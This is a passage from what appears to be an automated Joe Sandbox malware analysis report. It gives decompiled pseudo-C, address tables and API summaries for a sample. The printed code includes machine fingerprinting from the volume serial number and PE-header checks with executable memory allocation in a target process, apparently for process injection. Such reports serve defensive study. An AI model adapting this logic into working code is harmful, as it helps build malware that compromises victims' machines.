																	_t249 =  *(_t413 - 0x24);
																	__eflags = _t249;
																	if(_t249 <= 0) {
																		while(1) {
																			L70:
																			_t346 =  *0x3b8584; // 0x1
																			__eflags = _t346;
																			if(_t346 != 0) {
																				goto L72;
																			}
																			_t390 =  *0x3b8628; // 0x593938
																			 *((intOrPtr*)( *((intOrPtr*)(_t390 + 0xc8))))(0x4e20);
																			_t410 = _t410 - 1;
																			__eflags = _t410;
																			if(_t410 > 0) {
																				continue;
																			}
																			goto L72;
																		}
																		goto L72;
																	}
																	L69:
																	_t253 = _t249 - 1;
																	__eflags = _t253;
																	 *(_t413 - 0x24) = _t253;
																	_t410 = 1;
																	goto L70;
																}
																_t141 = _t410 - 5; // 0x5
																_t249 = _t141;
																 *0x3b8584 = 0;
																goto L69;
															}
															if(__eflags > 0) {
																L58:
																_t410 = E0039F2D0(_t413 - 0x5c0);
																_t255 = E003999A0(_t298, _t413 - 0x19, _t408, _t254, _t254);
																_push(8);
																__eflags = _t255;
																if(__eflags == 0) {
																	_push(_t413 - 0x9c0);
																	E00399090(__eflags);
																	E00399090(__eflags, _t413 - 0xdc0, 0xa);
																	_push(_t413 - 0xdc0);
																	_t396 = _t413 - 0x9c0;
																	_push(_t396);
																	_push(0xe);
																	_push(_t413 - 0x5c0);
																} else {
																	_push(_t413 - 0x9c0);
																	E00399090(__eflags);
																	E00399090(__eflags, _t413 - 0xdc0, 9);
																	_t396 = _t413 - 0xdc0;
																	_push(_t396);
																	_push(_t413 - 0x9c0);
																	_push(0xe);
																	_push(_t413 - 0x5c0);
																}
																E00395A10();
																_t261 = E0039BB40(_t410);
																__imp___time64(0);
																_t416 = _t416 + 0x28;
																 *(_t413 - 0x30) = _t261;
																 *(_t413 - 0x2c) = _t396;
																goto L62;
															}
															__eflags = _t410 - 0x7080;
															if(_t410 <= 0x7080) {
																goto L62;
															}
															goto L58;
														}
														if(__eflags > 0) {
															L51:
															_t398 =  *0x3b857c; // 0x1
															_t267 = _t410 -  *((intOrPtr*)( *((intOrPtr*)( *(_t413 - 0x5b8) + 0x28)) + _t398 * 8));
															__eflags = _t267;
															_t298 = _t408;
															asm("sbb ebx, [ecx+edx*8+0x4]");
															 *(_t413 - 0x5c) = _t408;
															if(__eflags < 0) {
																goto L55;
															}
															if(__eflags > 0) {
																L54:
																 *(_t413 - 0x44) = _t410;
																 *(_t413 - 0x40) = _t408;
																_t269 = E00391FE0(_t298, _t408, _t410, _t413 - 0xc, _t413 - 0x5c0, _t413 - 0x5b8); // executed
																_t416 = _t416 + 0xc;
																__eflags = _t269;
																if(_t269 != 0) {
																	_t270 = E003A0AD0(_t413 - 0x5c0,  *((intOrPtr*)( *(_t413 - 0x5b8) + 0x14)));
																	__eflags = _t270;
																	if(_t270 == 0) {
																		goto L82;
																	}
																	 *0x3b857c = 0;
																	goto L77;
																}
																goto L55;
															}
															__eflags = _t267 - 0x3840;
															if(_t267 <= 0x3840) {
																goto L55;
															}
															goto L54;
														}
														__eflags = _t241 - 0x4b0;
														if(_t241 <= 0x4b0) {
															goto L55;
														}
														goto L51;
													}
													_t272 = _t410 -  *(_t413 - 0x14);
													__eflags = _t272;
													asm("sbb ecx, [ebp-0x10]");
													 *(_t413 - 0x5c) = _t408;
													if(__eflags < 0) {
														goto L48;
													}
													if(__eflags > 0) {
														goto L46;
													}
													__eflags = _t272 - 0xe10;
													if(_t272 <= 0xe10) {
														goto L48;
													}
													goto L46;
													L72:
													_t236 =  *(_t413 - 0x48) + 1;
													 *(_t413 - 0x48) = _t236;
													__eflags = _t236 - 0x64;
												} while (_t236 < 0x64);
												goto L77;
											}
											if(__eflags > 0) {
												L34:
												_t282 = E0039AC90( *(_t413 - 0x5b8), _t413 - 0x5c0); // executed
												_t416 = _t416 + 8;
												__eflags = _t282;
												if(__eflags == 0) {
													goto L78;
												}
												 *(_t413 - 0x3c) = _t410;
												 *(_t413 - 0x38) = _t408;
												goto L36;
											}
											__eflags = _t230 - 0xe10;
											if(__eflags <= 0) {
												goto L36;
											}
											goto L34;
										}
										__eflags = _t227 - 1;
										if(_t227 != 1) {
											E0039C870(_t413 - 0x5c0, _t227);
											_t416 = _t416 + 8;
										}
										_t361 =  *0x3b8628; // 0x593938
										 *((intOrPtr*)( *((intOrPtr*)(_t361 + 0xc8))))(0x3e8);
										goto L78;
									}
									if(__eflags > 0) {
										L22:
										_t287 = E0039D890(_t410, __eflags, _t413 - 0xc, _t413 - 0x5c0, _t413 - 0x58); // executed
										_t421 = _t421 + 0xc;
										__eflags = _t287;
										if(_t287 == 0) {
											_t288 =  *((intOrPtr*)( *(_t413 - 0x5b8) + 0x24));
											_t363 =  *0x3b857c; // 0x1
											 *(_t288 + _t363 * 8) = _t410;
											_t405 =  *0x3b857c; // 0x1
											 *(_t288 + 4 + _t405 * 8) = _t408;
											goto L27;
										}
										__eflags = _t287 - 1;
										if(_t287 != 1) {
											E0039C870(_t413 - 0x5c0, _t287);
											_t416 = _t421 + 8;
										}
										_t289 =  *0x3b8628; // 0x593938
										 *((intOrPtr*)( *((intOrPtr*)(_t289 + 0xc8))))(0x3e8);
										goto L77;
									}
									__eflags = _t225 - 0x3840;
									if(__eflags <= 0) {
										goto L27;
									}
									goto L22;
								}
								_t407 =  *0x3b8628; // 0x593938
								 *((intOrPtr*)( *((intOrPtr*)(_t407 + 0xc8))))(0x3e8);
								L78:
								_t341 =  *0x3b857c; // 0x1
								_t218 =  *(_t413 - 0x5b8);
								_t325 = _t341 + 1;
								 *0x3b857c = _t325;
								__eflags = _t325 -  *((intOrPtr*)(_t218 + 0x18));
							} while (__eflags < 0);
							L79:
							_t220 = E003B0A40(_t408, _t410, __eflags, _t413 - 0xc, _t413 - 0x5b8);
							_t416 = _t416 + 8;
							__eflags = _t220;
							if(_t220 == 0) {
								__eflags =  *(_t413 - 0x20) - _t298;
								if(__eflags == 0) {
									L003B0D30(_t298, _t408, _t410, __eflags, _t413 - 0xc, _t413 - 0x5c0);
									_t416 = _t416 + 8;
								}
							}
						}
					} else {
						L12:
						E00391700(_t413 - 0xc);
						E0039F850(_t298, _t413 - 0x5c0);
						E0039C930(_t413 - 4);
						goto L83;
					}
				} else {
					E0039C930(_t413 - 4);
					L83:
					_t427 =  *0x3b85ac - _t298; // 0x0
					if(_t427 == 0) {
						L96:
						E00399480();
						E00397E10();
						ExitProcess(_t298);
					}
					_t374 =  *0x3b8628; // 0x593938
					_t411 = 0;
					 *((intOrPtr*)(_t413 - 0x70)) = 0;
					 *((intOrPtr*)(_t413 - 0x6c)) = 0;
					 *((intOrPtr*)(_t413 - 0x68)) = 0;
					 *((intOrPtr*)(_t413 - 0x64)) = 0;
					 *(_t413 - 0x18) = 0;
					 *((intOrPtr*)(_t413 - 0xb8)) = 0x44;
					 *((intOrPtr*)( *((intOrPtr*)(_t374 + 0xb8))))(_t413 - 0xb8);
					E00398030(_t413 - 0x18);
					_t204 = E003A1D90(0x20a, 0);
					_t299 = _t204;
					if(_t299 == 0) {
						L95:
						_t376 =  *0x3b8628; // 0x593938
						 *((intOrPtr*)( *((intOrPtr*)(_t376 + 0xd8))))( *(_t413 - 0x18), _t411, _t411, _t411, _t411, _t411, _t411, _t299, _t413 - 0xb8, _t413 - 0x70);
						_t377 =  *0x3b8628; // 0x593938
						 *((intOrPtr*)( *((intOrPtr*)(_t377 + 0xf8))))( *((intOrPtr*)(_t413 - 0x70)));
						_t378 =  *0x3b8628; // 0x593938
						 *((intOrPtr*)( *((intOrPtr*)(_t378 + 0xf8))))( *((intOrPtr*)(_t413 - 0x6c)));
						E0039BB40( *(_t413 - 0x18));
						_t298 = 0;
						goto L96;
					}
					_t379 =  *(_t413 - 0x18);
					_t412 = 0x104;
					_t409 = 0;
					while(1) {
						_t170 = _t412 + 0x7ffffefa; // 0x7ffffffe
						if(_t170 == 0) {
							break;
						}
						_t322 =  *_t379 & 0x0000ffff;
						if(_t322 == 0) {
							break;
						}
						 *_t204 = _t322;
						_t204 =  &(_t204[0]);
						_t379 =  &(_t379[1]);
						_t412 = _t412 - 1;
						if(_t412 != 0) {
							continue;
						}
						L91:
						_t204 = _t204 - 2;
						_t409 = 0x8007007a;
						L92:
						 *_t204 = 0;
						if(_t409 >= 0) {
							_t213 =  *0x3b8628; // 0x593938
							 *((intOrPtr*)( *((intOrPtr*)(_t213 + 0x1e8))))(_t299);
						}
						_t411 = 0;
						goto L95;
					}
					__eflags = _t412;
					if(_t412 != 0) {
						goto L92;
					}
					goto L91;
				}
			}





































































    0x0039fd20
    0x0039fd25
    0x0039fd28
    0x0039fd2d
    0x0039fd2f
    0x0039fd34
    0x0039fd39
    0x0039fd3e
    0x0039fd4b
    0x0039fd4b
    0x0039fd40
    0x0039fd47
    0x0039fd47
    0x0039fd4f
    0x0039fd56
    0x0039fd65
    0x0039fd67
    0x0039fd6b
    0x0039fd70
    0x0039fd71
    0x0039fd76
    0x0039fd76
    0x0039fd79
    0x0039fd7f
    0x0039fd8a
    0x0039fd90
    0x0039fd96
    0x0039fda7
    0x0039fdaf
    0x0039fdb7
    0x0039fdbc
    0x0039fdbe
    0x0039fdc1
    0x0039fdc4
    0x0039fdc9
    0x0039fdcc
    0x0039fdce
    0x0039fddf
    0x0039fdd0
    0x0039fdd7
    0x0039fdd7
    0x0039fdee
    0x0039fe05
    0x0039fe18
    0x0039fe28
    0x0039fe2d
    0x0039fe30
    0x0039fe32
    0x0039fe5d
    0x0039fe72
    0x0039fe74
    0x00000000
    0x00000000
    0x0039fe7c
    0x0039fe99
    0x0039fea2
    0x0039fea5
    0x0039fea8
    0x0039feab
    0x0039feae
    0x0039feb1
    0x0039feb4
    0x0039feb7
    0x0039feba
    0x0039febc
    0x0039fec0
    0x0039fec0
    0x0039fec6
    0x0039fec8
    0x0039fece
    0x0039fed1
    0x0039fed4
    0x00000000
    0x00000000
    0x0039fee0
    0x0039fee3
    0x0039fef4
    0x0039fef9
    0x0039fefb
    0x0039ff16
    0x0039ff25
    0x0039ff27
    0x0039ff2d
    0x0039ff30
    0x0039ff32
    0x0039ff32
    0x0039ff37
    0x0039ff3b
    0x0039ff3e
    0x0039ffac
    0x0039ffbb
    0x0039ffbd
    0x0039ffc2
    0x0039ffc5
    0x0039ffc7
    0x0039ffff
    0x003a0002
    0x003a0007
    0x003a0007
    0x003a000c
    0x003a000f
    0x003a0012
    0x003a0041
    0x003a0048
    0x003a004d
    0x003a0053
    0x003a0058
    0x003a005a
    0x003a005c
    0x003a0091
    0x003a00cc
    0x003a00cd
    0x003a00db
    0x003a00e6
    0x003a00ed
    0x003a00ee
    0x003a00f0
    0x003a00f6
    0x003a0093
    0x003a0099
    0x003a009a
    0x003a00a8
    0x003a00b3
    0x003a00b4
    0x003a00ba
    0x003a00bb
    0x003a00c3
    0x003a00c3
    0x003a005e
    0x003a0064
    0x003a0065
    0x003a0073
    0x003a0078
    0x003a007e
    0x003a0085
    0x003a0086
    0x003a008e
    0x003a008e
    0x003a00f7
    0x003a00fc
    0x003a00ff
    0x003a0102
    0x003a0104
    0x003a010a
    0x003a010c
    0x003a0111
    0x003a0114
    0x003a0116
    0x003a0119
    0x003a0133
    0x003a0146
    0x003a014b
    0x003a0158
    0x003a015b
    0x003a015e
    0x003a0161
    0x003a0164
    0x003a0166
    0x003a0166
    0x003a016b
    0x003a016d
    0x003a016d
    0x003a0172
    0x003a0175
    0x003a0178
    0x003a01d3
    0x003a01d3
    0x003a01d3
    0x003a01d6
    0x003a01d9
    0x003a01dc
    0x003a028f
    0x003a0295
    0x003a029a
    0x003a029c
    0x003a0372
    0x003a0372
    0x003a0372
    0x00000000
    0x003a0372
    0x003a02a8
    0x003a02aa
    0x003a02ab
    0x003a02b0
    0x003a02b3
    0x003a02b5
    0x00000000
    0x00000000
    0x003a02bb
    0x003a02c2
    0x003a02c7
    0x003a02ca
    0x003a02cc
    0x003a0369
    0x003a0370
    0x003a03cc
    0x003a03cf
    0x003a03da
    0x003a03e2
    0x003a03e7
    0x003a03e7
    0x00000000
    0x003a03e7
    0x00000000
    0x003a0370
    0x003a02d2
    0x003a02d9
    0x00000000
    0x00000000
    0x003a02df
    0x003a02e4
    0x003a02e9
    0x003a02eb
    0x003a02fc
    0x003a02ff
    0x003a0301
    0x003a0310
    0x003a0310
    0x003a0310
    0x003a0316
    0x003a0318
    0x00000000
    0x00000000
    0x003a031a
    0x003a032b
    0x003a032d
    0x003a032e
    0x003a0330
    0x00000000
    0x00000000
    0x00000000
    0x003a0330
    0x00000000
    0x003a0310
    0x003a0303
    0x003a0303
    0x003a0303
    0x003a0304
    0x003a0307
    0x00000000
    0x003a0307
    0x003a02ed
    0x003a02ed
    0x003a02f0
    0x00000000
    0x003a02f0
    0x003a01e2
    0x003a01f0
    0x003a01fb
    0x003a0201
    0x003a0206
    0x003a0208
    0x003a020a
    0x003a0245
    0x003a0246
    0x003a0254
    0x003a025f
    0x003a0260
    0x003a0266
    0x003a0267
    0x003a026f
    0x003a020c
    0x003a0212
    0x003a0213
    0x003a0221
    0x003a0226
    0x003a022c
    0x003a0233
    0x003a0234
    0x003a023c
    0x003a023c
    0x003a0270
    0x003a0279
    0x003a0280
    0x003a0286
    0x003a0289
    0x003a028c
    0x00000000
    0x003a028c
    0x003a01e4
    0x003a01ea
    0x00000000
    0x00000000
    0x00000000
    0x003a01ea
    0x003a017a
    0x003a0183
    0x003a018c
    0x003a0194
    0x003a0194
    0x003a0197
    0x003a0199
    0x003a019d
    0x003a01a0
    0x00000000
    0x00000000
    0x003a01a2
    0x003a01ab
    0x003a01bd
    0x003a01c0
    0x003a01c3
    0x003a01c8
    0x003a01cb
    0x003a01cd
    0x003a0354
    0x003a0359
    0x003a035b
    0x00000000
    0x00000000
    0x003a035d
    0x00000000
    0x003a035d
    0x00000000
    0x003a01cd
    0x003a01a4
    0x003a01a9
    0x00000000
    0x00000000
    0x00000000
    0x003a01a9
    0x003a017c
    0x003a0181
    0x00000000
    0x00000000
    0x00000000
    0x003a0181
    0x003a011d
    0x003a011d
    0x003a0122
    0x003a0125
    0x003a0128
    0x00000000
    0x00000000
    0x003a012a
    0x00000000
    0x00000000
    0x003a012c
    0x003a0131
    0x00000000
    0x00000000
    0x00000000
    0x003a0332
    0x003a0335
    0x003a0336
    0x003a0339
    0x003a0339
    0x00000000
    0x003a0342
    0x003a0014
    0x003a001d
    0x003a002b
    0x003a0030
    0x003a0033
    0x003a0035
    0x00000000
    0x00000000
    0x003a003b
    0x003a003e
    0x00000000
    0x003a003e
    0x003a0016
    0x003a001b
    0x00000000
    0x00000000
    0x00000000
    0x003a001b
    0x0039ffc9
    0x0039ffcc
    0x0039ffd6
    0x0039ffdb
    0x0039ffdb
    0x0039ffde
    0x0039ffef
    0x00000000
    0x0039ffef
    0x0039ff40
    0x0039ff49
    0x0039ff58
    0x0039ff5d
    0x0039ff60
    0x0039ff62
    0x0039ff96
    0x0039ff99
    0x0039ff9f
    0x0039ffa2
    0x0039ffa8
    0x00000000
    0x0039ffa8
    0x0039ff64
    0x0039ff67
    0x0039ff71
    0x0039ff76
    0x0039ff76
    0x0039ff79
    0x0039ff89
    0x00000000
    0x0039ff89
    0x0039ff42
    0x0039ff47
    0x00000000
    0x00000000
    0x00000000
    0x0039ff47
    0x0039fefd
    0x0039ff0e
    0x003a0374
    0x003a0374
    0x003a037a
    0x003a0380
    0x003a0381
    0x003a0387
    0x003a0387
    0x003a0390
    0x003a039b
    0x003a03a0
    0x003a03a3
    0x003a03a5
    0x003a03ab
    0x003a03ae
    0x003a03bf
    0x003a03c4
    0x003a03c4
    0x003a03ae
    0x003a03a5
    0x0039fe34
    0x0039fe34
    0x0039fe37
    0x0039fe42
    0x0039fe4a
    0x00000000
    0x0039fe4a
    0x0039fd58
    0x0039fd5b
    0x003a03e9
    0x003a03e9
    0x003a03ef
    0x003a04eb
    0x003a04eb
    0x003a04f0
    0x003a04f6
    0x003a04f6
    0x003a03f5
    0x003a03fb
    0x003a0403
    0x003a0406
    0x003a0409
    0x003a040c
    0x003a040f
    0x003a0412
    0x003a0423
    0x003a0429
    0x003a0434
    0x003a0439
    0x003a0440
    0x003a0495
    0x003a049c
    0x003a04b7
    0x003a04bc
    0x003a04c9
    0x003a04ce
    0x003a04db
    0x003a04e1
    0x003a04e9
    0x00000000
    0x003a04e9
    0x003a0442
    0x003a0445
    0x003a044a
    0x003a0450
    0x003a0450
    0x003a0458
    0x00000000
    0x00000000
    0x003a045a
    0x003a0460
    0x00000000
    0x00000000
    0x003a0462
    0x003a0465
    0x003a0468
    0x003a046b
    0x003a046c
    0x00000000
    0x00000000
    0x003a0474
    0x003a0474
    0x003a0477
    0x003a047c
    0x003a047e
    0x003a0483
    0x003a0485
    0x003a0491
    0x003a0491
    0x003a0493
    0x00000000
    0x003a0493
    0x003a0470
    0x003a0472
    0x00000000
    0x00000000
    0x00000000
    0x003a0472

    APIs
    • ??2@YAPAXI@Z.MSVCRT ref: 0039FD34
      • Part of subcall function 0039E850: CoCreateInstance.OLE32(003B638C,00000000,00000001,003B617C,?), ref: 0039E8A7
      • Part of subcall function 00393D50: VariantInit.OLEAUT32(?), ref: 00396306
      • Part of subcall function 00393D50: VariantInit.OLEAUT32(?), ref: 0039631E
      • Part of subcall function 00393D50: VariantClear.OLEAUT32(?), ref: 0039642C
      • Part of subcall function 00393D50: VariantClear.OLEAUT32(?), ref: 00396432
      • Part of subcall function 00393D50: VariantClear.OLEAUT32(?), ref: 00396438
      • Part of subcall function 00393D50: VariantInit.OLEAUT32(?), ref: 00396479
      • Part of subcall function 00393D50: VariantInit.OLEAUT32(?), ref: 00396497
      • Part of subcall function 00393D50: VariantInit.OLEAUT32(?), ref: 003964B8
      • Part of subcall function 00393D50: VariantClear.OLEAUT32(?), ref: 0039658F
      • Part of subcall function 00393D50: VariantClear.OLEAUT32(?), ref: 00396598
      • Part of subcall function 00393D50: VariantClear.OLEAUT32(?), ref: 0039659E
    • ExitProcess.KERNEL32 ref: 003A04F6
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 00397EC0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110library
    C-Code - Quality: 52%
    			E00397EC0(void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				char _v8;
				struct HINSTANCE__* _v12;
				char _v112;
				short _v312;
				struct HINSTANCE__* _t20;
				intOrPtr _t25;
				intOrPtr _t33;
				void* _t38;
				struct HINSTANCE__* _t49;
				intOrPtr* _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				void* _t54;

				_t38 = 0;
				_t51 = 0;
				_v8 = 0;
				E00399090(__eflags,  &_v312, 0x67);
				_t53 = _t52 + 8;
				_t20 = LoadLibraryW( &_v312); // executed
				_t49 = _t20;
				_v12 = _t49;
				if(_t49 == 0) {
					 *_a8 = 0;
					return 0;
				} else {
					E00396CB0( &_v112, 0x68);
					_t54 = _t53 + 8;
					_t50 = GetProcAddress(_t49,  &_v112);
					if(_t50 != 0) {
						_v8 = 0x100;
						_t33 = E003A1D90(0x100, 0);
						_t54 = _t54 + 8;
						_push(0);
						_push( &_v8);
						_t51 = _t33;
						_push(_t51);
						_push(_a4);
						if( *_t50() != 0) {
							L5:
							_t38 = 1;
						} else {
							if(GetLastError() == 0x7a) {
								_push(0);
								_push( &_v8);
								_push(_t51);
								_push(_a4);
								if( *_t50() != 0) {
									goto L5;
								}
							}
						}
					}
					_t25 =  *0x3b8628; // 0x593938
					 *((intOrPtr*)( *((intOrPtr*)(_t25 + 0x1c))))(_v12);
					if(_t38 != 0) {
						 *_a8 = _t51;
						return _t38;
					} else {
						if(_t51 == 0) {
							 *_a8 = _t51;
							return _t38;
						} else {
							E0039BB40(_t51);
							 *_a8 = 0;
							return _t38;
						}
					}
				}
			}

















    0x00397ed4
    0x00397ed7
    0x00397ed9
    0x00397edc
    0x00397ee1
    0x00397eeb
    0x00397ef1
    0x00397ef3
    0x00397ef8
    0x00397fb3
    0x00397fbc
    0x00397efe
    0x00397f04
    0x00397f09
    0x00397f17
    0x00397f1b
    0x00397f23
    0x00397f2a
    0x00397f32
    0x00397f35
    0x00397f39
    0x00397f3a
    0x00397f3c
    0x00397f3d
    0x00397f42
    0x00397f5f
    0x00397f5f
    0x00397f44
    0x00397f4d
    0x00397f52
    0x00397f56
    0x00397f57
    0x00397f58
    0x00397f5d
    0x00000000
    0x00000000
    0x00397f5d
    0x00397f4d
    0x00397f42
    0x00397f67
    0x00397f70
    0x00397f74
    0x00397f97
    0x00397fa0
    0x00397f76
    0x00397f78
    0x00397fa5
    0x00397fae
    0x00397f7a
    0x00397f7b
    0x00397f89
    0x00397f92
    0x00397f92
    0x00397f78
    0x00397f74

    APIs
    • LoadLibraryW.KERNEL32(?), ref: 00397EEB
    • GetProcAddress.KERNEL32(00000000,?), ref: 00397F11
    • GetLastError.KERNEL32 ref: 00397F44
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 0039F0B0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74
    C-Code - Quality: 88%
    			E0039F0B0(intOrPtr _a4) {
				long _v8;
				intOrPtr _v14;
				signed short _v18;
				intOrPtr _v24;
				short _v34;
				intOrPtr _v38;
				short _v40;
				char _v240;
				short _v760;
				void* _t46;
				void* _t55;

				_v8 = 0;
				memset( &_v760, 0, 0x208);
				if(GetWindowsDirectoryW( &_v760, 0x208) == 0) {
					_v760 = 0x43;
				}
				_v40 = _v760;
				_v38 = 0x5c003a;
				_v34 = 0;
				GetVolumeInformationW( &_v40, 0, 0,  &_v8, 0, 0, 0, 0); // executed
				_v24 = E003B1200( &_v8);
				E003B1200( &_v8);
				_v18 = E003B1200( &_v8);
				_t46 = 0;
				do {
					 *((char*)(_t55 + _t46 - 0xc)) = E003B1200( &_v8);
					_t46 = _t46 + 1;
					_t61 = _t46 - 8;
				} while (_t46 < 8);
				E00399090(_t61, _a4, 0xa1);
				E00399090(_t61,  &_v240, 0xc6);
				_push(_v14);
				_push(_v18 & 0x0000ffff);
				return E003A0C10(_a4, 0x64,  &_v240, _v24);
			}














    0x0039f0c7
    0x0039f0ce
    0x0039f0ea
    0x0039f0f1
    0x0039f0f1
    0x0039f0ff
    0x0039f113
    0x0039f11a
    0x0039f11e
    0x0039f12c
    0x0039f132
    0x0039f13f
    0x0039f143
    0x0039f145
    0x0039f14d
    0x0039f151
    0x0039f152
    0x0039f152
    0x0039f161
    0x0039f172
    0x0039f181
    0x0039f182
    0x0039f19a

    APIs
    • memset.MSVCRT ref: 0039F0CE
    • GetWindowsDirectoryW.KERNEL32(?,00000208), ref: 0039F0E2
    • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0039F11E
      • Part of subcall function 003A0C10: _vsnwprintf.MSVCRT ref: 003A0C42
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 0039B3B0, Relevance: 6.6, APIs: 2, Strings: 2, Instructions: 552
    C-Code - Quality: 83%
    			E0039B3B0(void* __ebx, void* __ecx, void* __edi, int _a4) {
				int _v8;
				int _v12;
				int _v16;
				int* _v20;
				unsigned int _v24;
				int _v28;
				int _v32;
				void* _v36;
				int _v40;
				char _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v152;
				void* __esi;
				int _t181;
				intOrPtr* _t186;
				int _t187;
				int _t191;
				int _t193;
				intOrPtr _t194;
				int _t203;
				int _t205;
				signed int _t206;
				int _t212;
				int* _t222;
				int _t225;
				signed int _t226;
				intOrPtr _t230;
				int _t231;
				int _t235;
				int _t238;
				intOrPtr _t240;
				int _t241;
				int _t242;
				int _t244;
				int _t245;
				int* _t246;
				int _t247;
				void* _t248;
				int _t250;
				int _t252;
				int* _t254;
				int _t257;
				signed int _t258;
				intOrPtr* _t261;
				int _t263;
				intOrPtr* _t266;
				int _t270;
				int _t273;
				void* _t275;
				int _t277;
				int _t278;
				int _t280;
				int _t283;
				long _t284;
				void* _t286;
				int _t287;
				int _t288;
				void* _t289;
				int _t290;
				int _t291;
				intOrPtr* _t297;
				int _t310;
				int _t319;
				int _t320;
				int _t322;
				intOrPtr _t327;
				void* _t333;
				unsigned int _t339;
				unsigned short _t342;
				int* _t349;
				int* _t353;
				int _t371;
				intOrPtr _t374;
				int _t384;
				intOrPtr* _t387;
				int _t388;
				int _t390;
				int _t391;
				int _t393;
				intOrPtr _t394;
				void* _t396;
				int _t397;
				int _t398;
				void* _t399;
				void* _t401;
				int _t402;
				int _t403;
				void* _t404;
				void* _t405;

				_t286 = __ebx;
				_t404 = __ecx;
				_v36 = 0;
				if( *((intOrPtr*)(__ecx + 0x70)) == 0) {
					_t3 = _t404 + 0x74; // 0xffff95d7
					_t297 =  *_t3;
					_v24 = _t297;
					__eflags =  *_t297 - 0x5a4d;
					if( *_t297 == 0x5a4d) {
						_t186 =  *((intOrPtr*)(_t297 + 0x3c)) + _t297;
						__eflags =  *_t186 - 0x4550;
						_v8 = _t186;
						if( *_t186 == 0x4550) {
							_push(__edi);
							_push(0x40);
							_t387 = _t186;
							_t187 = _a4;
							_push(0x2000);
							_push( *((intOrPtr*)(_t387 + 0x50)));
							_push( *((intOrPtr*)(_t387 + 0x34)));
							_push(_t187);
							E003A1E80(); // executed
							_v12 = _t187;
							__eflags = _t187;
							if(_t187 != 0) {
								L7:
								_push(4);
								_v16 = _t187 -  *((intOrPtr*)(_t387 + 0x34));
								_push(0x1000);
								_push( *((intOrPtr*)(_t387 + 0x54)));
								_push(_t187);
								_push(_a4);
								E003A1E80(); // executed
								_t388 = _t187;
								__eflags = _t388;
								if(_t388 != 0) {
									_push(_t286);
									_t287 = _v8;
									_v32 = E0039DF30(_t404,  *(_t287 + 0x80));
									 *(_t287 + 0x80) = 0;
									_t191 = E00397B30(_t404, _a4, _t388, _v24,  *((intOrPtr*)(_t287 + 0x54))); // executed
									__eflags = _t191;
									if(_t191 != 0) {
										_t193 = E0039D9D0(_t404, _a4, _t388,  *((intOrPtr*)(_t287 + 0x54)), 2); // executed
										__eflags = _t193;
										if(_t193 != 0) {
											_t310 = _t287;
											_t29 = _t310 + 0x18; // 0x18
											_t194 = ( *(_t310 + 0x14) & 0x0000ffff) + _t29;
											_v52 = _t194;
											_v28 = 0;
											__eflags = 0 -  *((intOrPtr*)(_t310 + 6));
											if(0 >=  *((intOrPtr*)(_t310 + 6))) {
												L20:
												__eflags = _v16;
												if(_v16 == 0) {
													L32:
													_t390 = _v32;
													__eflags = _t390;
													if(_t390 == 0) {
														L53:
														_t288 =  *((intOrPtr*)(_v8 + 0x78));
														_v32 = _t288;
														_t391 = E0039DF30(_t404, _t288);
														_v28 = _t391;
